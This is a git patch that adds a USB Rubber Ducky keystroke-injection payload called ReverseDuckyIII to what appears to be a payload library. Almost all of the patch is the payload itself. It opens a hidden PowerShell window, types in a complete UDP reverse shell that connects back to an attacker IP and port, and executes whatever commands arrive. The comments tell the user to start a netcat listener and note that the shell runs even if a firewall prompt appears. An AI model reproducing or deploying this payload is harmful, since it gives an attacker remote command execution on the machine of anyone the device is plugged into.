From 8e3cb4821164969436015229d1c5fe878cba2041 Mon Sep 17 00:00:00 2001
From: 0iphor13 <79219148+0iphor13@users.noreply.github.com>
Date: Mon, 31 Jan 2022 11:37:15 +0100
Subject: [PATCH] Uploaded ReverseDuckyIII

As all good things come in three, here's another ReverseDucky.

This time a udp reverse shell. Not as nice and comfortable as a tcp shell, but shell is shell <3
---
 .../remote_access/ReverseDuckyIII/payload.txt | 29 +++++++++++++++++++
 1 file changed, 29 insertions(+)
 create mode 100644 payloads/library/remote_access/ReverseDuckyIII/payload.txt

diff --git a/payloads/library/remote_access/ReverseDuckyIII/payload.txt b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
new file mode 100644
index 0000000..0cd20cb
--- /dev/null
+++ b/payloads/library/remote_access/ReverseDuckyIII/payload.txt
@@ -0,0 +1,29 @@
+REM       ReverseDucky3
+REM       Version 1.0
+REM       OS: Windows / Linux(?) (Not tested with Powershell on Linux)
+REM       Author: 0iphor13
+
+REM       UDP Reverse shell executed in the background. Might create a firewall pop up, but will execute anyway.
+REM       Fill in Attacker-IP and Port in Line 18
+REM       DON'T FORGET TO START LISTENER: nc -ul -p PORT
+
+DELAY 1500
+GUI r
+DELAY 500
+STRING powershell -NoP -NonI -W hidden
+DELAY 250
+ENTER
+
+DELAY 200
+STRING $E=New-Object System.Net.IPEndPoint ([System.Net.IPAddress]::Parse("0.0.0.0"),PORT);$C=New-Object System.Net.So
+DELAY 100
+STRING ckets.UDPClient(53);[byte[]]$B=0..65535|%{0};$SB=([text.encoding]::ASCII).GetBytes('ReverseDuckyIII:');$C.Send($SB,$S
+DELAY 100
+STRING B.Length,$E);while($true){;$R=$C.Receive([ref]$E);$RD=([text.encoding]::ASCII).GetString($R);$s=(iex $RD 2>&1 | Out-S
+DELAY 100
+STRING tring );$s2=$s+'PS ' + (pwd).Path + '> ';$SB =([text.encoding]::ASCII).GetBytes($s2);$C.Send($SB,$SB.Len
+DELAY 100
+STRING gth,$E)};$C.Close()
+ENTER
+
+